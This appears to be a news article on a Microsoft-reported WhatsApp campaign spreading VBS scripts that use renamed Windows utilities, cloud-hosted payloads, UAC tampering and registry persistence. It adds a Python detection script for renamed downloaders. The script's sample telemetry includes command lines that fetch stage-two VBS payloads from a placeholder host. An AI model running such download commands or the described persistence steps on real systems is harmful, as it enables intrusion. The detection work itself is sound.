Microsoft has raised concerns over a recent malware campaign that exploits WhatsApp messages to distribute harmful Visual Basic Script (VBS) files. This malicious activity, observed since late February 2026, employs these scripts to initiate a complex infection chain designed to establish persistence and allow remote control of the affected systems. However, the specific tactics used by the attackers to entice users into running these scripts remain unclear.
Exploitation Techniques and Delivery Methods
The campaign utilizes a blend of social engineering and ‘living-off-the-land’ strategies, according to the Microsoft Defender Security Research Team. By repurposing built-in Windows utilities and retrieving payloads from reputable cloud services like AWS, Tencent Cloud, and Backblaze B2, the attackers maintain a low profile and enhance their chances of a successful breach. The VBS files are disseminated through WhatsApp messages; once a recipient runs one, it creates concealed directories and drops copies of Windows utilities such as ‘curl.exe’ and ‘bitsadmin.exe’ under different file names.
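A renamed copy of curl.exe or bitsadmin.exe still carries its original name in the PE version resource, which is what endpoint telemetry such as Sysmon exposes as OriginalFileName. The following is an added detection example, not code from Microsoft's report: it scans constructed process-creation records for a watched utility whose on-disk name differs from its embedded name, and for a Windows Script Host process (wscript.exe/cscript.exe, assumed here; the report does not name the host) launching one of those utilities. Field names, paths and the cloud host are all made up for the sample.

```python
import ntpath
from dataclasses import dataclass
from typing import List

# Windows utilities the report says were dropped under other file names.
WATCHED_UTILITIES = {"curl.exe", "bitsadmin.exe"}

# Script hosts that execute a delivered .vbs file (assumption: the standard
# Windows Script Host binaries; the report does not name the host used).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


@dataclass
class ProcessEvent:
    """Minimal process-creation record, modelled on Sysmon Event ID 1 fields."""
    image: str               # full path of the executed file
    original_file_name: str  # OriginalFileName from the PE version resource
    parent_image: str        # full path of the parent process
    command_line: str


@dataclass
class Finding:
    rule: str
    image: str
    detail: str


def embedded_name(ev: ProcessEvent) -> str:
    return ev.original_file_name.lower()


def is_renamed_utility(ev: ProcessEvent) -> bool:
    """A watched utility whose on-disk name differs from the name compiled into
    its version resource is a renamed copy, whatever directory it sits in."""
    on_disk = ntpath.basename(ev.image).lower()
    return embedded_name(ev) in WATCHED_UTILITIES and on_disk != embedded_name(ev)


def spawned_by_script_host(ev: ProcessEvent) -> bool:
    """A VBS payload runs under wscript/cscript; those hosts have no routine
    reason to launch curl or bitsadmin, renamed or not."""
    parent = ntpath.basename(ev.parent_image).lower()
    return parent in SCRIPT_HOSTS and embedded_name(ev) in WATCHED_UTILITIES


def scan_process_events(events: List[ProcessEvent]) -> List[Finding]:
    findings: List[Finding] = []
    for ev in events:
        if is_renamed_utility(ev):
            findings.append(Finding(
                "renamed-utility", ev.image,
                f"on-disk name differs from OriginalFileName={ev.original_file_name}"))
        if spawned_by_script_host(ev):
            findings.append(Finding(
                "script-host-launches-downloader", ev.image,
                f"parent={ev.parent_image} cmd={ev.command_line}"))
    return findings


# Constructed sample telemetry (not from the report); paths and hosts are made up.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\curl.exe", "curl.exe",
                 r"C:\Windows\System32\cmd.exe",
                 "curl.exe -s https://example.org/status"),
    ProcessEvent(r"C:\Users\alice\AppData\Local\Temp\.sys\wupd.exe", "curl.exe",
                 r"C:\Windows\System32\wscript.exe",
                 r"wupd.exe -o C:\Users\alice\AppData\Local\Temp\.sys\stage2.vbs "
                 r"https://bucket.example-cloud.invalid/stage2.vbs"),
    ProcessEvent(r"C:\Windows\System32\bitsadmin.exe", "bitsadmin.exe",
                 r"C:\Windows\System32\wscript.exe",
                 r"bitsadmin /transfer job /download /priority foreground "
                 r"https://bucket.example-cloud.invalid/p.vbs C:\Users\alice\AppData\Local\Temp\p.vbs"),
    ProcessEvent(r"C:\Windows\System32\notepad.exe", "NOTEPAD.EXE",
                 r"C:\Windows\explorer.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for f in scan_process_events(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.image}: {f.detail}")
```

The first rule fires on the renamed copy alone, so it does not depend on the process tree; the second fires on the un-renamed bitsadmin.exe as well, because the suspicious part there is the script-host parent rather than the file name. Hunting on OriginalFileName rather than the image path is what defeats the renaming described in the report.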
Gaining System Control and Persistence
After initial access is secured, the attackers strive to sustain their presence and elevate privileges by installing malicious Microsoft Installer (MSI) packages. They accomplish this by downloading additional VBS scripts from cloud platforms using the renamed utilities. Microsoft notes that the malware then tampers with User Account Control (UAC) settings to undermine system defenses, repeatedly attempting to launch ‘cmd.exe’ with elevated privileges until UAC elevation succeeds or the process is terminated.
Registry entries are modified to embed persistence mechanisms, ensuring the malware survives system reboots. This allows attackers to gain elevated privileges without user interaction by combining registry manipulation with UAC bypass methods, ultimately deploying unsigned MSI installers. Tools like AnyDesk may be utilized for maintaining remote access, facilitating data exfiltration or further malware deployment.
Analysis of the Threat’s Impact
This campaign showcases a sophisticated infection methodology that blends social engineering via WhatsApp, stealth tactics such as renamed legitimate tools, and cloud-hosted payloads. The use of legitimate tools and trusted platforms lets the attackers’ traffic and process activity blend in with routine network activity, significantly increasing the likelihood of a successful breach.
The implications of such attacks are profound, as they allow unauthorized remote access and data theft, posing a severe threat to system integrity and user privacy. Vigilance and robust security measures are essential to mitigate such risks, emphasizing the need for user awareness and proactive defense strategies.
Microsoft’s findings underscore the importance of staying informed about emerging threats and implementing comprehensive security protocols to protect against evolving cyberattacks.
